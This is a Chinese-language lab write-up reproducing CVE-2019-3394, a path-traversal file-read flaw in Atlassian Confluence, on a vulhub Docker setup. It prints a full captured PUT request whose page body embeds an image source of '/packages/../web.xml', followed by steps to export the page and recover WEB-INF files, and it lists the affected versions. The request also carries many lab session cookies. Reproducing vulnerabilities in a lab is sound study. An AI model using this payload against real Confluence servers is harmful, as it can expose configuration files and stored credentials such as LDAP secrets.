Confluence 文件读取漏洞复现(CVE-2019-3394)

声明

好好学习,天天向上

漏洞描述

Atlassian Confluence是企业广泛使用的wiki系统
Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。

影响范围

6.1.0 <= version < 6.6.16

6.7.0 <= version < 6.13.7

6.14.0 <= version < 6.15.8

复现过程

这里使用6.10.2版本

使用vulhub的cve-2019-3396版(搭建难度还是有的,所以不要轻易放弃,所以这里安装过程和3396的一样啦)

cd /app/vulhub-master/confluence/CVE-2019-3396

使用docker启动

docker-compose up -d

搭建过程可参考

https://blog.csdn.net/nex1less/article/details/102783999

https://www.cnblogs.com/Zh1z3ven/p/13755525.html

环境的话建议给虚机分配4G以上内存,我这里本身docker是2G,直接崩了,我又临时调到8G(以后再也不吝啬了),然后还得重新删镜像拉镜像

环境启动后,访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书,这一步稍微有点繁琐,有点耐心,需要填写邮箱然后注册(不要选择Data Center和Addons):

http://192.168.239.129:8090

最好先在安装页面,这里最好记录下ServerID

BLQS-RN83-KEI3-FET1

获取后,点next

Confluence 文件读取漏洞复现(CVE-2019-3394)

就是这里,我也是docker-compose up/down反复搞了好久,才进入到用户管理配置

Confluence 文件读取漏洞复现(CVE-2019-3394)

墙内用户,该跳过的跳过

点击创建,进入到创建的页面,写好标题和正文内容,再点击右下角发布抓包

Confluence 文件读取漏洞复现(CVE-2019-3394)

这是我的报文内容(不太好抓,BP里面每个请求转发时都搜索关键字就好了)

PUT /rest/api/content/65617?status=draft HTTP/1.1
Host: 192.168.239.129:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.239.129:8090/pages/resumedraft.action?draftId=65617&draftShareId=4b88b998-1600-40c9-b35c-e47e9f674494
Content-Length: 369
Cookie: LxuP_2132_saltkey=OMF1tm3T; LxuP_2132_lastvisit=1606894588; LxuP_2132_ulastactivity=2f71gpPVBSW4xfz43JuiDfM%2F0mpBLLmtHNRn8C61FS4kFgZxTJ8n; LxuP_2132_lastcheckfeed=1%7C1606898453; LxuP_2132_nofavfid=1; qMBc_2132_sid=I5b1w1; qMBc_2132_saltkey=xAQhmQRQ; qMBc_2132_lastvisit=1606973661; qMBc_2132_lastact=1606977478%09misc.php%09patch; qMBc_2132_seccode=3.8a8437292a0e156a9d; qMBc_2132_ulastactivity=631euTfLsH2SDcarY2CPsrtGmLOXGlUTjkv4obaoQSepXdhgy%2FGV; qMBc_2132_auth=d792eKiQ1yQS9rIoiBOJa0b%2Fl00zf%2FhOfWYYIVhN3wo%2FZ0YV%2F5C4tp3ARdfVKedcqKN3UpF8iCP0fafvPC7P; qMBc_2132_lastcheckfeed=2%7C1606977275; qMBc_2132_lip=Manual+Acting%2C1606977251; qMBc_2132_nofavfid=1; dH5g_2132_saltkey=mIQcCC5I; dH5g_2132_lastvisit=1606974982; dH5g_2132_sid=VUkTKd; dH5g_2132_lastact=1606978855%09home.php%09spacecp; dH5g_2132_seccode=2.c3d57b048c88d7cffb; dH5g_2132_ulastactivity=e35aNpy3yHC6zAiJV0YMLXLqujGMC5T7dTcg3FEpx4Z5H045HtB7; dH5g_2132_auth=488bFp2bXZh3XFx5QvQ27pop6p6FOFc0UWqVC%2B9ZL3NfnF6LvmjrAnEPp0STuBqLt0Y6Qy5dlXCiDLRx50j2; dH5g_2132_nofavfid=1; wxTp_2132_sid=ROOfYq; wxTp_2132_saltkey=WE8r8h8K; wxTp_2132_lastvisit=1606976300; wxTp_2132_lastact=1606980407%09misc.php%09patch; wxTp_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; wxTp_2132_seccode=7.afaaaba06ac830f87b; wxTp_2132_ulastactivity=a1876qkUep0STAD5x6RGuzSW4OfiO1Xr1STrKzcpTYkR4jRmZDut; wxTp_2132_auth=1f91XJ4rWdWCYb%2BlhT8DUPCbp0A0u1XXn1CwCdHY2GJOYPrT4vnE2tuD8t2ddGpp05JwPni8cby%2FnCEoh5H5; wxTp_2132_lastcheckfeed=1%7C1606980025; wxTp_2132_lip=192.168.239.158%2C1606979545; wxTp_2132_nofavfid=1; oEc_sid=vVVHvY; oEc_cookietime=2592000; oEc_auth=4a95ARoccwG5crxEL5hybGcp7IZoXNQMyju4wnvsJB3pZxJdh43N6udrFX8INT7g%2BXQR%2BEQ6zzHbUSI87IzNgQ; oEc_visitedfid=2; smile=1D1; redirect=1; JSESSIONID=58A795CE4E26BC6B82A91D2DCAD4AC81; seraph.confluence=491521%3Adb2261de7e3dd0b193d49ab9265b2abdb8b5e91e
DNT: 1
Connection: close

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

Confluence 文件读取漏洞复现(CVE-2019-3394)

这一步比较关键,怎么说呢,在转发的时候修改,成功的几率比较大,最好不要放重放里,我这一次成功是通过,先插入一个图片,图片来自网络,修改图片URL为

/packges/../web.xml

图片插入成功后,一定记住最终攻击都是在更新的按钮,抓包修改的(也就是上一张图和上述代码),点击更新后,看准了POST的接口,修改整个POST请求体为,我是在转发的时候改的,用重放,虽然报的200,但是文件读取失败了

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

成功后,可以看到我们已经把src成功插入到html中,怎么这么像XSS

Confluence 文件读取漏洞复现(CVE-2019-3394)

点击右下角更新按钮后,F5刷新一下,可以看到右上角有个三个点。。。,点击导出word后,抓包,方便查看文件

Confluence 文件读取漏洞复现(CVE-2019-3394)

Confluence 文件读取漏洞复现(CVE-2019-3394)

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
上一篇:你的NMS该换了!Confluence:实现更准、更强的目标检测


下一篇:Confluence 6 协同编辑邀请